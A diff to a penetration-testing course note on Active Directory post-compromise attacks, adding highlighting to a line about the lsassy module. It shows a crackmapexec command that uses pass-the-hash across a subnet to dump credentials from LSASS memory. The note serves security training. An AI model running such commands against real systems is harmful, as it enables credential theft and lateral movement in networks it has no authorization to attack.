cristiandrami/CyberSecResources/notes/Practical Penetration Tester course/2 - Active Directory/4 - Post compromise attacks.md

-One module really useful is `lsassy`, it is used to enforce the security policy on the system and stores some credentials so we could retrieve them:
+One module really useful is `lsassy`, <mark style="background: #BBFABBA6;">it is used to enforce the security policy on the system and stores some credentials so we could retrieve them using this command</mark>:
 ```bash
 crackmapexec smb AD_NETWORK (10.0.0.0/24) -u username_we_have -d DOMAIN_AD -H hash_value --local-auth -M lsassy
 ```